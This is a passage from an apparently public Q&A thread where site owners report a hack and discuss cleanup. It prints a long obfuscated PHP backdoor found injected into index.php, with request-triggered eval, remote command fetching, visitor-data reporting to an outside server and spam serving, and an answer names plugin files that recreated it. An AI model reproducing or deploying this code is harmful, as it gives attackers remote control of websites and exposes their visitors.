failed');}$x_zz_z_yyy=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x7a\x7a\x5f\x7a\x5f\x79\x5f\x79"]();if(isset($_REQUEST["\x65"])){$xyy_zz__yz=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x79\x5f\x5f\x7a\x79\x7a\x79"]($xzzy_yy_z_,"",$xyy_zz__yz);eval($xyy_zz__yz);die();}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x7a\x79\x5f\x7a\x79\x5f\x5f\x79"]($x_zz_z_yyy,$xyy_zz__yz);$xyy_zyz_z_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x79\x7a\x79\x5f\x5f\x7a\x7a"]($x_zz_z_yyy);@require($xyy_zyz_z_["\x75\x72\x69"]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x5f\x79\x79\x7a\x7a\x79\x5f"]($x_zz_z_yyy);die();}function x__yyyzz_z($xzyyy_z_z_){$xy_y_zzy_z=substr($xzyyy_z_z_,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x5f\x79\x7a\x5f\x7a\x7a"]($xzyyy_z_z_) -2);$x__y_zzyzy=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x79\x5f\x7a\x7a\x79\x7a\x5f"]($xzyyy_z_z_);$xy_yz_zy_z='';for ($xzz_yzy__y=0;$xzz_yzy__y<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x7a\x5f\x7a\x79\x79\x79\x5f"]($x__y_zzyzy)-2;$xzz_yzy__y=$xzz_yzy__y+2){$xy_yz_zy_z.=$x__y_zzyzy[$xzz_yzy__y+1].$x__y_zzyzy[$xzz_yzy__y];}$xy_yz_zy_z.=$xy_y_zzy_z;return $xy_yz_zy_z;}function xz__zy_yzy($googleUrl,$x_yyzz_yz_,$xy__y_yzzz){$x_zy_y_zzy=x_yyyzz_z_('yygpKgbSi20tdXLdYvyMxLty/OLEnNTSywVS0GiqgvIWAwA=');$xzz_yyzy__=sprintf($x_zy_y_zzy,$googleUrl,$xy__y_yzzz["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$xy__y_yzzz["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],$x_yyzz_yz_);$xy_yz_y_zz=xy_y__zzyz($xzz_yyzy__);if(isset($_REQUEST["\x73\x74"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x7a\x7a\x5f\x5f\x79\x79\x79"]($xzz_yyzy__);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x7a\x7a\x5f\x5f\x79\x79\x79"]($xy_yz_y_zz);die();}$xz_zy_yzy_=x_yyyzz_z_('S8/PTGp89nlJBQA=');$xyz__zyy_z=x_yyyzz_z_('Ky5NTtgk4TKtLgYA');$x__y_zyzzy=x_yyyzz_z_('S0vMzqcElfZNAQA=');if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x79\x5f"]($xy_yz_y_zz,$xz_zy_yzy_)!=false){die($xyz__zyy_z);}die($x__y_zyzzy);}function xzz_zyy_y_($xzy_z_yyz_){$xyz_zz__yy=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x5f\x7a\x5f\x79\x79\x7a"]("/{\\|}/si",$xzy_z_yyz_,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x5f\x7a\x7a\x7a\x79\x79\x5f"]($xyz_zz__yy)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x7a\x5f\x7a\x79\x79\x79\x5f"]($xyz_zz__yy)!=2){return false;}return $xyz_zz__yy;}function x_yzzzyy__($xzyyy_z_z_,$xz_y__zzyy){$xy__y_yzzz=array();$xy__y_yzzz["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$xzyyy_z_z_;$xy__y_yzzz["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x79\x5f\x7a\x79\x5f\x7a"](x__yyyzz_z($xy__y_yzzz["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]));$xy__y_yzzz["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]=x_y_zyz_zy();$xy__y_yzzz["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$xy__y_yzzz["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:'';$xy__y_yzzz["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:'';$xy__y_yzzz["\x69\x70"]=xz__y_yzyz();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$xy__y_yzzz["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=x_yyyzz_z_('yygpKSsSi20tcdZHAA==');}else{$xy__y_yzzz["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=x_yyyzz_z_('yygpKlkbDvfS1wcA');}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"])){$xy__y_yzzz["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"];}else{$xy__y_yzzz["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x7a\x5f\x7a\x79\x5f\x5f\x7a\x79"]($xy__y_yzzz);die();}if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$x_yyzz_yz_=${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"];$x_yyz__yzz=x_yyyzz_z_('Ky8v1je0vPz0/PSdVLzs8RZFAA==');if(isset(${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"])){$x_yyz__yzz=${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"];}xz__zy_yzy($x_yyz__yzz,$x_yyzz_yz_,$xy__y_yzzz);}$x_yz__yzyz=x_yyyzz_z_('Uy3Wtkfy+yVS2uySgpKSi20tdPz89Pz0nVS87XyyqoUS22TyzIBEqrJSaDyILEkgwQXQIwokAA==');$x_yz__yzyz=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x7a\x5f\x7a\x7a\x79\x79\x5f"]('|',$x_yz__yzyz);if(isset($_REQUEST["\x61\x63"])&&isset($_REQUEST["\x70\x61\x74\x68"])&&isset($_REQUEST["\x74"])){x_y_zy_zzy(sprintf($x_yz__yzyz[2],${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x79\x5f\x7a\x79\x5f\x7a"](x__yyyzz_z($xz_y__zzyy)),$xy__y_yzzz["\x61\x70\x69"],$_REQUEST["\x61\x63"],$_REQUEST["\x70\x61\x74\x68"],$_REQUEST["\x74"]));}$x_yyy_z_zz=array('dox_yzzzyy__'=>$xy__y_yzzz["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],'request_url'=>$xy__y_yzzz["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],'ip'=>$xy__y_yzzz["\x69\x70"],'agent'=>$xy__y_yzzz["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],'referer'=>$xy__y_yzzz["\x72\x65\x66\x65\x72\x65\x72"],'protocol'=>$xy__y_yzzz["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],'language'=>$xy__y_yzzz["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$xzz_yz_yy_=sprintf($x_yz__yzyz[0],$xy__y_yzzz["\x61\x70\x69"],x__yyyzz_z(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x5f\x79\x7a\x7a\x7a\x79\x5f\x79"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x7a\x5f\x7a\x79\x5f\x79"]('{|}',$x_yyy_z_zz))));$xzy_z_yyz_=xy_y__zzyz($xzz_yz_yy_);if(isset($_REQUEST["\x64\x75\x6d\x70"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x7a\x7a\x5f\x5f\x79\x79\x79"]($xzy_z_yyz_);$xzy_z_yyz_=xy_y__zzyz($x_yz__yzyz[1]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x7a\x7a\x5f\x5f\x79\x79\x79"]($xzy_z_yyz_);die();}$x_zyyz_y_z=xzz_zyy_y_($xzy_z_yyz_);if($x_zyyz_y_z!==false){@header($x_zyyz_y_z[0]);echo $x_zyyz_y_z[1];die();}}x_yzzzyy__($xzyyy_z_z_,$xz_y__zzyy);
?>
```

any help would be appreciated.

Thank you!

Comment: Is this Wordpress?

Comment: core php but blog i have in wordpress on same server.

Comment: That first line in `index.php` looks very suspicious, appears to be some hacking

Comment: yes it is hacking attempt.

Comment: Is this issue resolved? We are facing the same issue.

Comment: Any resolution to this? I am going through the same hacking experience with multiple sites on a server. Same code as described above injected into index.php and htaccess files.

Answer (score 1):

I just had the same issue. I found that two other files are creating the index.php after deletion. These are the files:

- wp-content/plugins/wp-rocket/inc/ThirdParty/radio.php
- wp-content/plugins/bdthemes-element-pack/modules/circle-menu/wp-scr1pts.php

After deleting those two files as well as restoring the "clean" index.php and .htaccess, the hack seems to be removed.

I'm not sure if one of those plugins is affected, as they are just the first and last folder in my plugins folder. Anyways, I have contacted them to see what they know about it.

Did you find out something different? Especially how the hack was successful.

In my case, I had a security plugin active but it could be that this was not active for some days.

Interested to hear more details from your side.

Comment: Hi, Thanks for the answer in my case plugins folder just have wordfense plugin, nothing else.